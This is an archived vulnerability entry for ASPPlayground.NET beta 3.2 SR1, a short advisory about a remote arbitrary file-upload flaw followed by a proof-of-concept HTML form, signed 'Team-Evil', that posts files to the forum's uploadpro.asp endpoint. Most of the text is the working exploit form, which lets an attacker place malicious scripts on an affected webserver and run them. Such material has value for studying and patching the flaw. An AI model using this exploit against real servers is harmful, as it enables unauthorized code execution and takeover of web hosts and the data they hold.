source: https://www.securityfocus.com/bid/14070/info
ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.
Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server.
This issue can ultimately help attackers gain unauthorized access in the context of the webserver.
http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=
refer to
http://www.example.com/forum/post.asp
*
ASP Playground html bug :
___________________________
<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>
</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">
<form method="POST" action="http://www.example.com/forum/uploadpro.asp?
memori=&deletefile=&mode=" enctype="multipart/form-data"
onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1"
cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">
</td>
</tr>
</form>
</table>
</body>
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
</html>
